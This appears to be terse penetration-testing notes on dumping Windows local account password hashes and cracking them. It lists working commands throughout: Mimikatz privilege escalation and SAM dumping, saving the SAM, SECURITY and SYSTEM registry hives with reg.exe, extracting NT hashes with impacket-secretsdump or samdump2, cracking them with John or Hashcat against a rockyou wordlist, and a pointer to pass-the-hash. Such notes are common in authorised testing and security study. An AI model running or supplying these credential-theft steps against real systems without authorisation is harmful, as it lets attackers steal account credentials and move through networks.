If cannot crack, maybe can consider pass the hash.
Mimikatz
- To obtain this from running system, need to have admin rights and run mimikatz.
privilege::debug
token::elevate
lsadump::sam
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt --format=NT
Registry (REG SAVE)
- On target, run:
reg.exe save hklm\sam sam.save
reg.exe save hklm\security security.save
reg.exe save hklm\system system.save
- Then run:
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
- If no security.save use (try not to):
samdump2 system.save sam.save
- The NT hash is 4th item. Can also use John:
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt --format=NT
- Hashcat:
hashcat -m 1000 -a 0 hash.txt /usr/share/seclists/rockyou.txt